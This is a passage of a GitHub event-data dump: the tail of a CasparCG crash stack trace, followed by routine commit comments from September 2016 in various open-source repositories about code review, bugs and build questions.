boost::log::v2s_mt_nt5::sinks::basic_formatting_sink_frontend<char>::formatting_context::formatting_context\r\n[2016-09-03 21:59:31.871] [1128] [error]       000000013F7BEE5E (casparcg): (filename not available): boost::property_tree::detail::rapidxml::xml_document<wchar_t>::skip_and_expand_character_refs<boost::property_tree::detail::rapidxml::xml_document<wchar_t>::text_pred,boost::property_tree::detail::rapidxml::xml_document<wchar_t>::text_pure_no_ws_pred,0>\r\n[2016-09-03 21:59:31.871] [1128] [error]       c:\\program files (x86)\\jenkins\\jobs\\casparcg_server_2.1.0\\workspace\\dependencies64\\boost\\boost\\smart_ptr\\make_shared_object.hpp (247): boost::make_shared<boost::log::v2s_mt_nt5::sinks::text_file_backend,boost::parameter::aux::tagged_argument<boost::log::v2s_mt_nt5::keywords::tag::file_name,std::basic_string<wchar_t,std::char_traits<wchar_t>,std::allocator<wchar_t> > const > const & __ptr64,boost::parameter::aux::tagged_argument<boost::log::v2s_mt_nt5::keywords::tag::time_based_rotation,boost::log::v2s_mt_nt5::sinks::file::rotation_at_time_point const > const & __ptr64,boost::parameter::aux::tagged_argument<boost::log::v2s_mt_nt5::keywords::tag::auto_flush,bool const > const & __ptr64,boost::parameter::aux::tagged_argument<boost::log::v2s_mt_nt5::keywords::tag::open_mode,enum std::_Iosb<int>::_Openmode const > const & __ptr64>\r\n[2016-09-03 21:59:31.871] [1128] [error]       000000013F7CBE5F (casparcg): (filename not available): std::_Tree<std::_Tmap_traits<std::basic_string<wchar_t,std::char_traits<wchar_t>,std::allocator<wchar_t> >,int,std::less<std::basic_string<wchar_t,std::char_traits<wchar_t>,std::allocator<wchar_t> > >,std::allocator<std::pair<std::basic_string<wchar_t,std::char_traits<wchar_t>,std::allocator<wchar_t> > const ,int> >,0> >::_Erase\r\n[2016-09-03 21:59:31.871] [1128] [error]       000000013FB992A3 (casparcg): (filename not available): boost::exception_detail::clone_impl<caspar::ffmpeg::ffmpeg_error>::clone\r\n[2016-09-03 21:59:31.871] [1128] [error]       000007FEF2F282DD (ucrtbase): (filename not available): crt_at_quick_exit\r\n[2016-09-03 21:59:31.871] [1128] [error]       00000000776459ED (kernel32): (filename not available): BaseThreadInitThunk\r\n[2016-09-03 21:59:31.871] [1128] [error]       000000007787B371 (ntdll): (filename not available): RtlUserThreadStart\r\n[2016-09-03 21:59:31.871] [1128] [error]   \r\n```"}},"created_at":"2016-09-03T20:04:02Z"}
{"id":"4512678163","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18891019,"position":23,"line":2296,"path":"src/game/Creature.cpp","commit_id":"e9f9b43fe2351289f8f5a34efef8709d5e4fd30f","created_at":"2016-09-03T20:05:32Z","updated_at":"2016-09-03T20:05:32Z","body":"You should consider possibly watching the other cores (TBC and classic) as this has been PR'd for the TBC branch since february.. it's no issue, but I think you are right that this is a bit more flexible which is why it's a shame we didn't get to push your version instead of kartoffels right away."}},"created_at":"2016-09-03T20:05:32Z"}
{"id":"4512678543","type":"CommitCommentEvent","actor":{"login":"lex3a"},"repo":{"name":"AuroraWright/Luma3DS"},"payload":{"comment":{"id":18891020,"position":null,"line":null,"path":null,"commit_id":"bd992fca15616ece6c7f6c14cd5768e0abaab013","created_at":"2016-09-03T20:05:55Z","updated_at":"2016-09-03T20:05:55Z","body":"Did I miss something? Why it became unnecessary?"}},"created_at":"2016-09-03T20:05:55Z"}
{"id":"4512681425","type":"CommitCommentEvent","actor":{"login":"yesnault"},"repo":{"name":"ovh/tat"},"payload":{"comment":{"id":18891025,"position":6,"line":73,"path":"api/cache/cache.go","commit_id":"4fe7e12d1447d781a639f7b553eb726e2b08b7c1","created_at":"2016-09-03T20:08:04Z","updated_at":"2016-09-03T20:08:04Z","body":"```\r\nfunc removeSomeMembers(key string, members ...string) {\r\n\tClient().SRem(key, members)\r\n}\r\n\r\n```\r\nis not same than\r\n\r\n```\r\nfunc removeSomeMembers(key string, members ...string) {\r\n\tm := make([]interface{}, len(members))\r\n\tfor i, member := range members {\r\n\t\tm[i] = member\r\n\t}\r\n\tClient().SRem(key, m...)\r\n}\r\n```\r\n\r\nand just Client().SRem(key, members) -> not working (I'd just test to check)"}},"created_at":"2016-09-03T20:08:04Z"}
{"id":"4512683142","type":"CommitCommentEvent","actor":{"login":"nosovk"},"repo":{"name":"dudeonthehorse/kilogram"},"payload":{"comment":{"id":18891029,"position":null,"line":null,"path":null,"commit_id":"cf341a09ba6dc6d2e4cb01000515a9ebeeaceee1","created_at":"2016-09-03T20:09:33Z","updated_at":"2016-09-03T20:09:33Z","body":"Is there any example how to use macros?\r\nIt would be nice to setup some variables on a start - like utm campaing, and use them in a templates later..."}},"created_at":"2016-09-03T20:09:33Z"}
{"id":"4512683280","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18891030,"position":null,"line":null,"path":null,"commit_id":"1fdac43d71e002de86ea89218f5c5c2b267f0c38","created_at":"2016-09-03T20:09:38Z","updated_at":"2016-09-03T20:09:38Z","body":"good job"}},"created_at":"2016-09-03T20:09:38Z"}
{"id":"4512685758","type":"CommitCommentEvent","actor":{"login":"t4nk074"},"repo":{"name":"t4nk074/angband"},"payload":{"comment":{"id":18891035,"position":null,"line":null,"path":null,"commit_id":"bc384983ed6ed1fb2c23cc2b5b74fb643520e5b1","created_at":"2016-09-03T20:11:42Z","updated_at":"2016-09-03T20:11:42Z","body":"Yeah, I thought about that. But it's only useful in spell menu and now in curses menu. On the other hand,, it's not difficult to do, and maybe it will find some other uses elsewhere..."}},"created_at":"2016-09-03T20:11:42Z"}
{"id":"4512686543","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Vidigan/EDL"},"payload":{"comment":{"id":18891038,"position":null,"line":null,"path":null,"commit_id":"a928b3cf2f81f8687d1bc56247bec4b8edf87068","created_at":"2016-09-03T20:12:23Z","updated_at":"2016-09-03T20:12:23Z","body":"Mover pro diretório `trabalho-02/`"}},"created_at":"2016-09-03T20:12:23Z"}
{"id":"4512687442","type":"CommitCommentEvent","actor":{"login":"rossi2000"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":18891047,"position":null,"line":null,"path":null,"commit_id":"253f4b44605fc8d93dda61950a96dba2523405a8","created_at":"2016-09-03T20:13:13Z","updated_at":"2016-09-03T20:13:13Z","body":"now that i understand how that works, yes it is  :) i copied it from atv initially during the adding of the solo4k.  :)\r\n\r\ni have made some amendments, thanks!"}},"created_at":"2016-09-03T20:13:13Z"}
{"id":"4512691341","type":"CommitCommentEvent","actor":{"login":"basrieter"},"repo":{"name":"domoticz/domoticz"},"payload":{"comment":{"id":18891056,"position":null,"line":null,"path":null,"commit_id":"dcc09b1b0779ca1f1a88dce96947dab7093a89a4","created_at":"2016-09-03T20:16:30Z","updated_at":"2016-09-03T20:16:30Z","body":"I just updated Domoticz to build 831988e and my two Aeotec Smart 6 switch became completely useless now, as I can't switch them anymore. They switch off and then back on, or the other way around."}},"created_at":"2016-09-03T20:16:30Z"}
{"id":"4512692429","type":"CommitCommentEvent","actor":{"login":"dfbassi"},"repo":{"name":"dfbassi/smartsystem"},"payload":{"comment":{"id":18891058,"position":null,"line":null,"path":null,"commit_id":"78a468e36b484b88c3834969e101ea9aebb2d61b","created_at":"2016-09-03T20:17:17Z","updated_at":"2016-09-03T20:17:17Z","body":"Simple solution, but necessary to complete show function...."}},"created_at":"2016-09-03T20:17:17Z"}
{"id":"4512692460","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18891059,"position":null,"line":null,"path":null,"commit_id":"37668908f9234db55ff04fb22e3d17b8c7114488","created_at":"2016-09-03T20:17:18Z","updated_at":"2016-09-03T20:17:18Z","body":"For the menu, wouldn't stress over the actual content organization. Goal is to first get it to look nice and function well. We can deal with the content organization down the road(note the end plan is to have the menu be configurable on a per user basis). There's a roadmap for this feature here(note this is just a general plan; the one who does the work generally always gets to decide what to do :) ):\r\nhttp://www.open-emr.org/wiki/index.php/Active_Projects#Frame_Removal"}},"created_at":"2016-09-03T20:17:18Z"}
{"id":"4512692680","type":"CommitCommentEvent","actor":{"login":"andrepereiradasilva"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":18891061,"position":null,"line":null,"path":null,"commit_id":"1d9228037963242ad7b15017faa1026f61c4c50d","created_at":"2016-09-03T20:17:30Z","updated_at":"2016-09-03T20:17:30Z","body":"there's go the second saved here https://github.com/joomla/joomla-cms/commit/8276f079fb4b53ed93776855d9985b9cff6b932d :smile: "}},"created_at":"2016-09-03T20:17:30Z"}
{"id":"4512692804","type":"CommitCommentEvent","actor":{"login":"Moyster"},"repo":{"name":"m571-cm/android_vendor_meizu_m2note"},"payload":{"comment":{"id":18891062,"position":null,"line":null,"path":null,"commit_id":"ba9712a74aa97435d6407aaf1e4d145d69987002","created_at":"2016-09-03T20:17:38Z","updated_at":"2016-09-03T20:17:38Z","body":"but it wasn't in my CM builds and it wasn't in stock rom either ?\r\nVisi0naRy seemed to do this also on p8000"}},"created_at":"2016-09-03T20:17:38Z"}
{"id":"4512693424","type":"CommitCommentEvent","actor":{"login":"metaphore"},"repo":{"name":"crashinvaders/gdx-texture-packer-gui"},"payload":{"comment":{"id":18891067,"position":null,"line":null,"path":null,"commit_id":"f74f38019be21703f2ef5efd427cd6c26dd108f0","created_at":"2016-09-03T20:18:11Z","updated_at":"2016-09-03T20:18:11Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;cFtmS7Xv&#x2F;2-refactor-canvas-to-sub-controller-with-full-support-of-events-and-dependency-injection-remove-direct-calls-from-main-controller\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Refactor canvas to sub controller with full support of events and dependency injection. Remove direct calls from main controller</a>"}},"created_at":"2016-09-03T20:18:11Z"}
{"id":"4512693512","type":"CommitCommentEvent","actor":{"login":"MajorPlayz"},"repo":{"name":"PeaceOfDevs/MiniGames-Core"},"payload":{"comment":{"id":18891068,"position":null,"line":null,"path":null,"commit_id":"5fba46c8e8f570d6021fa74024fa5f8ff0a1ced3","created_at":"2016-09-03T20:18:14Z","updated_at":"2016-09-03T20:18:14Z","body":"Aw man I liked that XD but yes I agree, maybe in a future update"}},"created_at":"2016-09-03T20:18:14Z"}
{"id":"4512700580","type":"CommitCommentEvent","actor":{"login":"Svyatpro"},"repo":{"name":"wine-compholio/wine-staging"},"payload":{"comment":{"id":18891077,"position":null,"line":null,"path":null,"commit_id":"b4c93af2cbe4bd8935a114922b7b7c7f44a806c4","created_at":"2016-09-03T20:24:26Z","updated_at":"2016-09-03T20:24:26Z","body":"I found where is the problem. WineD3D for Windows needs \"wined3d-Revert_PixelFormat/0001-Revert-wined3d-Call-wglGetPixelFormat-through-the-gl.patch\" in order to work. This patch was disabled with CSMT patchset reeanble."}},"created_at":"2016-09-03T20:24:26Z"}
{"id":"4512705246","type":"CommitCommentEvent","actor":{"login":"charlespeters"},"repo":{"name":"swashcap/anchorage"},"payload":{"comment":{"id":18891082,"position":22,"line":22,"path":"webpack.config.js","commit_id":"ce33b10727571848e982b09add416961c481a3dc","created_at":"2016-09-03T20:28:24Z","updated_at":"2016-09-03T20:28:24Z","body":"wouldn't the query of the loader just grab the babel presets in my package.json?"}},"created_at":"2016-09-03T20:28:24Z"}
{"id":"4512705567","type":"CommitCommentEvent","actor":{"login":"basrieter"},"repo":{"name":"domoticz/domoticz"},"payload":{"comment":{"id":18891084,"position":null,"line":null,"path":null,"commit_id":"dcc09b1b0779ca1f1a88dce96947dab7093a89a4","created_at":"2016-09-03T20:28:42Z","updated_at":"2016-09-03T20:28:42Z","body":"Is there a way to go back to yesterdays build?\r\n"}},"created_at":"2016-09-03T20:28:42Z"}
{"id":"4512705763","type":"CommitCommentEvent","actor":{"login":"Red17211"},"repo":{"name":"Red17211/hello-world"},"payload":{"comment":{"id":18891085,"position":4,"line":4,"path":"README.md","commit_id":"7f38e0e77ed1565fc90cfd9c278053213a7391de","created_at":"2016-09-03T20:28:54Z","updated_at":"2016-09-03T20:28:54Z","body":"Just another repository"}},"created_at":"2016-09-03T20:28:54Z"}
{"id":"4512706372","type":"CommitCommentEvent","actor":{"login":"charlespeters"},"repo":{"name":"swashcap/anchorage"},"payload":{"comment":{"id":18891086,"position":1,"line":1,"path":"testem.json","commit_id":"ce33b10727571848e982b09add416961c481a3dc","created_at":"2016-09-03T20:29:24Z","updated_at":"2016-09-03T20:29:24Z","body":"what's the value prop of testem vs karma?"}},"created_at":"2016-09-03T20:29:24Z"}
{"id":"4512706750","type":"CommitCommentEvent","actor":{"login":"slackner"},"repo":{"name":"wine-compholio/wine-staging"},"payload":{"comment":{"id":18891087,"position":null,"line":null,"path":null,"commit_id":"b4c93af2cbe4bd8935a114922b7b7c7f44a806c4","created_at":"2016-09-03T20:29:44Z","updated_at":"2016-09-03T20:29:44Z","body":"I believe the problem you encountered had nothing to do with CSMT. There was an upstream regression which broke wined3d for Windows a while ago. Just last week it was fixed with the following commit: http://source.winehq.org/git/wine.git/commit/c2e316a3e6afaf1eea05a9f86f9e5275cbfcf9e6 (which will also be included in the next Staging release)."}},"created_at":"2016-09-03T20:29:44Z"}
{"id":"4512707743","type":"CommitCommentEvent","actor":{"login":"james-d-elliott"},"repo":{"name":"AuroraWright/Luma3DS"},"payload":{"comment":{"id":18891092,"position":null,"line":null,"path":null,"commit_id":"bd992fca15616ece6c7f6c14cd5768e0abaab013","created_at":"2016-09-03T20:30:27Z","updated_at":"2016-09-03T20:30:27Z","body":"Pretty sure because of https://github.com/AuroraWright/Luma3DS/commit/a2bca96d479c4df689cc9f3ae58100f3a850941a"}},"created_at":"2016-09-03T20:30:27Z"}
{"id":"4512708749","type":"CommitCommentEvent","actor":{"login":"charlespeters"},"repo":{"name":"swashcap/anchorage"},"payload":{"comment":{"id":18891095,"position":3,"line":3,"path":"test.js","commit_id":"ce33b10727571848e982b09add416961c481a3dc","created_at":"2016-09-03T20:31:16Z","updated_at":"2016-09-03T20:31:16Z","body":"1. semi colons will murder us all\r\n2. am i testing for an assertion like if the function returns a value? "}},"created_at":"2016-09-03T20:31:16Z"}
{"id":"4512712513","type":"CommitCommentEvent","actor":{"login":"hzoo"},"repo":{"name":"babel/babel-preset-env"},"payload":{"comment":{"id":18891097,"position":43,"line":43,"path":"README.md","commit_id":"548813e67d024dc4bd0f7b692f1ae57c6cf1d886","created_at":"2016-09-03T20:34:29Z","updated_at":"2016-09-03T20:34:29Z","body":"Just easier to implement in userland as a preset - it would be nice in core."}},"created_at":"2016-09-03T20:34:29Z"}
{"id":"4512713812","type":"CommitCommentEvent","actor":{"login":"hzoo"},"repo":{"name":"babel/babel-preset-env"},"payload":{"comment":{"id":18891099,"position":1,"line":1,"path":"src/plugins.js","commit_id":"e2b00b5d6dcb93c3ef1517171790ba871963aa0f","created_at":"2016-09-03T20:35:33Z","updated_at":"2016-09-03T20:35:33Z","body":"This is all WIP/POC. The data is probably wrong as well. It would be better getting the data from an actual source like the compat tables, and yeah we can completely change all of this"}},"created_at":"2016-09-03T20:35:33Z"}
{"id":"4512713845","type":"CommitCommentEvent","actor":{"login":"gautierhattenberger"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":18891100,"position":null,"line":null,"path":null,"commit_id":"16a447da37ea718646906756cda17a5ed38d8739","created_at":"2016-09-03T20:35:34Z","updated_at":"2016-09-03T20:35:34Z","body":"Not really sure. It is useful in cases like the gameboy trick especially with parrot drones since a datalink based RC was needed in addition. It is probably a good idea as well with multiple UAV flying to avoid using too many RC.\r\nAre your joysticks seen as datalink RC ? If it is the case, you probably don't need to change the way it is done now."}},"created_at":"2016-09-03T20:35:34Z"}
{"id":"4512716355","type":"CommitCommentEvent","actor":{"login":"terezka"},"repo":{"name":"watson/nodeboat"},"payload":{"comment":{"id":18891102,"position":null,"line":null,"path":null,"commit_id":"d23b1e50a8a5cf45631fc112709f53921a7d2321","created_at":"2016-09-03T20:37:32Z","updated_at":"2016-09-03T20:37:32Z","body":"*attendee"}},"created_at":"2016-09-03T20:37:32Z"}
{"id":"4512717103","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18891103,"position":null,"line":null,"path":null,"commit_id":"74bae5305c1c4554f1a469515fac956cd11a1ee3","created_at":"2016-09-03T20:38:08Z","updated_at":"2016-09-03T20:38:08Z","body":"Здравствуйте.\r\nДля инлайн редактирование со своим экшном сохранение, можно ли как нибудь туда передать переменные из массива?\r\n```\r\nif(!empty($column['editable']['save_action'])){\r\n        $save_action = $column['editable']['save_action'];\r\n}\r\n```\r\nТут просто передается значение из массива save_action, а хотелось бы туда еще передать ID что бы знать какой именно запись изменить.\r\nА еще лучше, если бы в файле grid были доступы все переменные внутри editable\r\n```\r\n'editable' => array( //хотелось бы другие переменные были доступны по {name} как в href\r\n\t'table' => 'cats',\r\n\t'save_action' => 'inline'\r\n),\r\n```"}},"created_at":"2016-09-03T20:38:08Z"}
{"id":"4512717569","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18891104,"position":5,"line":54,"path":"runtime/autoload/man.vim","commit_id":"c9e39f8227e320e156c92ee5192223304a9f1761","created_at":"2016-09-03T20:38:29Z","updated_at":"2016-09-03T20:38:29Z","body":"I was seeing \"No lines in buffer\" message."}},"created_at":"2016-09-03T20:38:29Z"}
{"id":"4512718941","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18891105,"position":null,"line":null,"path":null,"commit_id":"2331e218dc88408c5cb2db9a7b5f9ebbed82e2d6","created_at":"2016-09-03T20:39:27Z","updated_at":"2016-09-03T20:39:27Z","body":"You are right. \r\n\r\nIn view.py we see the following code\r\n`def parse_spsa_params(raw, spsa):\r\nand it will behave as you said.\r\n\r\nThe initial c is computed this way\r\nnum_iter * (c_end ** gamma)\r\n\r\nGreat ! I learned something today !!!\r\n\r\n"}},"created_at":"2016-09-03T20:39:27Z"}
{"id":"4512723488","type":"CommitCommentEvent","actor":{"login":"nhooyr"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18891108,"position":5,"line":54,"path":"runtime/autoload/man.vim","commit_id":"c9e39f8227e320e156c92ee5192223304a9f1761","created_at":"2016-09-03T20:42:48Z","updated_at":"2016-09-03T20:42:48Z","body":"That is coming from line 76 (`keepjumps %delete _`). Not sure why but I don't get that message unless I manually execute it in a man buffer."}},"created_at":"2016-09-03T20:42:48Z"}
{"id":"4512723826","type":"CommitCommentEvent","actor":{"login":"rschaerer"},"repo":{"name":"lerndichfrei/lerndichfrei.github.io"},"payload":{"comment":{"id":18891109,"position":5,"line":0,"path":"About.html","commit_id":"201f8fd11259ec93ddd849f236089bd9aca78154","created_at":"2016-09-03T20:43:04Z","updated_at":"2016-09-03T20:43:04Z","body":"Gratuliere zur ersten Änderung. :-)"}},"created_at":"2016-09-03T20:43:04Z"}
{"id":"4512724324","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891110,"position":152,"line":112,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T20:43:26Z","updated_at":"2016-09-03T20:43:26Z","body":"There must be a better way than .map here. Also .values is only in ES6, needed to set Chrome flag"}},"created_at":"2016-09-03T20:43:26Z"}
{"id":"4512724550","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891111,"position":23,"line":23,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:43:38Z","updated_at":"2016-09-03T20:43:38Z","body":"Читай следующую строку!))\r\n\r\n> Don't actually copy these 2 lines!"}},"created_at":"2016-09-03T20:43:38Z"}
{"id":"4512724980","type":"CommitCommentEvent","actor":{"login":"basrieter"},"repo":{"name":"domoticz/domoticz"},"payload":{"comment":{"id":18891112,"position":null,"line":null,"path":null,"commit_id":"dcc09b1b0779ca1f1a88dce96947dab7093a89a4","created_at":"2016-09-03T20:43:59Z","updated_at":"2016-09-03T20:43:59Z","body":"Created an issue for this: https://github.com/domoticz/domoticz/issues/844"}},"created_at":"2016-09-03T20:43:59Z"}
{"id":"4512725053","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891113,"position":152,"line":112,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T20:44:03Z","updated_at":"2016-09-03T20:44:03Z","body":"Adding `console.log(replRegex);` will yield\r\n\r\n    /{|}|\\\\|<p>|<\\/p>|<hr>|<em>|<i>|<\\/em>|<\\/i>|<strong>|<b>|<\\/strong>|<\\/b>|<|>|^|\\^|&|%|\\$|#|_|&|%|\\$|#|_|&|%|\\$|#|_|&|%|\\$|#|_|&|%|\\$|#|_|…|&nbsp;|  /g"}},"created_at":"2016-09-03T20:44:03Z"}
{"id":"4512725724","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18891115,"position":5,"line":54,"path":"runtime/autoload/man.vim","commit_id":"c9e39f8227e320e156c92ee5192223304a9f1761","created_at":"2016-09-03T20:44:36Z","updated_at":"2016-09-03T20:44:36Z","body":"Actually these suppress the `\"man://...\" [New DIRECTORY]` messages. The \"No lines in buffer\" message came from somewhere else, perhaps it was the `:read !...`.\r\n\r\nIf you think the `\"man://...\" [New DIRECTORY]` messages are worth having feel free to revert this."}},"created_at":"2016-09-03T20:44:36Z"}
{"id":"4512727813","type":"CommitCommentEvent","actor":{"login":"bdon"},"repo":{"name":"osmlab/sf_building_height_import"},"payload":{"comment":{"id":18891117,"position":null,"line":null,"path":null,"commit_id":"a1d7dbcc4c4ed0d1ee59b953bde593b7c4d0d9d4","created_at":"2016-09-03T20:46:17Z","updated_at":"2016-09-03T20:46:17Z","body":"2 decimal places seems unnecessarily precise to me - 1 meter is a reasonable amount for the parapet of a building, for example. I feel like most other building datasets in OSM (example:nyc) are rounded to meters . could be convinced otherwise"}},"created_at":"2016-09-03T20:46:17Z"}
{"id":"4512728005","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891118,"position":15,"line":15,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:46:28Z","updated_at":"2016-09-03T20:46:28Z","body":"Консоль открывал? 100%, что этот файл не грузится у тебя"}},"created_at":"2016-09-03T20:46:28Z"}
{"id":"4512728172","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891119,"position":18,"line":18,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:46:36Z","updated_at":"2016-09-03T20:46:36Z","body":"И этот тоже"}},"created_at":"2016-09-03T20:46:36Z"}
{"id":"4512728278","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891120,"position":21,"line":21,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:46:42Z","updated_at":"2016-09-03T20:46:42Z","body":"И этот"}},"created_at":"2016-09-03T20:46:42Z"}
{"id":"4512728509","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891121,"position":26,"line":26,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:46:54Z","updated_at":"2016-09-03T20:46:54Z","body":"Не будет грузится"}},"created_at":"2016-09-03T20:46:54Z"}
{"id":"4512729863","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891122,"position":34,"line":34,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:48:01Z","updated_at":"2016-09-03T20:48:01Z","body":"У тебя URL неверный. 100% этот скрипт не грузится и ничего не работает. Ты же его грузишь, как файл с файловой системы компа. А это URL. Консоль смотрел?"}},"created_at":"2016-09-03T20:48:01Z"}
{"id":"4512731534","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891125,"position":141,"line":141,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:49:26Z","updated_at":"2016-09-03T20:49:26Z","body":"Пояснение простое. Если jQuery не подключена, выполняется код справа от `||`, а именно добавляет jQuery"}},"created_at":"2016-09-03T20:49:26Z"}
{"id":"4512731921","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891126,"position":142,"line":142,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:49:42Z","updated_at":"2016-09-03T20:49:42Z","body":"Не будет грузится"}},"created_at":"2016-09-03T20:49:42Z"}
{"id":"4512732036","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891127,"position":143,"line":143,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:49:47Z","updated_at":"2016-09-03T20:49:47Z","body":"Не будет грузится"}},"created_at":"2016-09-03T20:49:47Z"}
{"id":"4512732120","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18891128,"position":145,"line":145,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-03T20:49:52Z","updated_at":"2016-09-03T20:49:52Z","body":"Не будет грузится"}},"created_at":"2016-09-03T20:49:52Z"}
{"id":"4512733214","type":"CommitCommentEvent","actor":{"login":"ErkanOzdemir"},"repo":{"name":"vendidero/woocommerce-germanized"},"payload":{"comment":{"id":18891129,"position":null,"line":null,"path":null,"commit_id":"6742aa668aff94a0950888c75d8fc586ed4dd69a","created_at":"2016-09-03T20:50:44Z","updated_at":"2016-09-03T20:50:44Z","body":"hi, ich musste feststellen das version 1.7 bei mir mit den payment gateways einen fehler beim checkout auswirft. Ich bekomme einen json fehler und die Kasse bleibt im schritt 3 hängen. ich habe jetzt zurück auf version 1.6.5 downgraden können. gibt es da bald nen fix?"}},"created_at":"2016-09-03T20:50:44Z"}
{"id":"4512733441","type":"CommitCommentEvent","actor":{"login":"ShevT"},"repo":{"name":"m571-cm/android_vendor_meizu_m2note"},"payload":{"comment":{"id":18891131,"position":null,"line":null,"path":null,"commit_id":"ba9712a74aa97435d6407aaf1e4d145d69987002","created_at":"2016-09-03T20:50:55Z","updated_at":"2016-09-03T20:50:55Z","body":"Put it away."}},"created_at":"2016-09-03T20:50:55Z"}
{"id":"4512733576","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891132,"position":88,"line":49,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T20:51:02Z","updated_at":"2016-09-03T20:51:02Z","body":"Could/should this be an array? `{`->`[`"}},"created_at":"2016-09-03T20:51:02Z"}
{"id":"4512734858","type":"CommitCommentEvent","actor":{"login":"jemdream"},"repo":{"name":"jemdream/Coordinates"},"payload":{"comment":{"id":18891133,"position":51,"line":46,"path":"Coordinates.UI/Views/MeasurementFlow/MeasurementProcess.xaml.cs","commit_id":"7a505b208293a15abfc62a08ab57c07d6bf2375e","created_at":"2016-09-03T20:51:58Z","updated_at":"2016-09-03T20:51:58Z","body":"Selection fix"}},"created_at":"2016-09-03T20:51:58Z"}
{"id":"4512735380","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891134,"position":72,"line":44,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T20:52:22Z","updated_at":"2016-09-03T20:52:22Z","body":"This was added in an attempt to avoid\r\n\r\n    \"&\": { match: \"&\",\r\n         replace: \"\\\\&\"},\r\n    \"%\": { match: \"\\\\%\",\r\n         replace: \"\\\\&\"},\r\n    \"$\": { match: \"\\\\$\",\r\n         replace: \"\\\\$\"},\r\n    \"#\": { match: \"#\",\r\n         replace: \"\\\\#\"},\r\n    \"_\": { match: \"_\",\r\n         replace: \"\\\\_\"},\r\n\r\nThere is a lot of repetitiveness here and it is not easy to read.\r\nUnfortunately this approach causes a lot of repetition in the regex, see the line note at 112.\r\nI wanted to have this directly in the replacements object literal at line 93, but the following is not valid JavaScript syntax:\r\n\r\n    \"&\", \"%\", \"$\", \"#\", \"_\": { match: \"&|%|\\\\$|#|_\",\r\n                         replace: \"\\\\$&\" },"}},"created_at":"2016-09-03T20:52:22Z"}
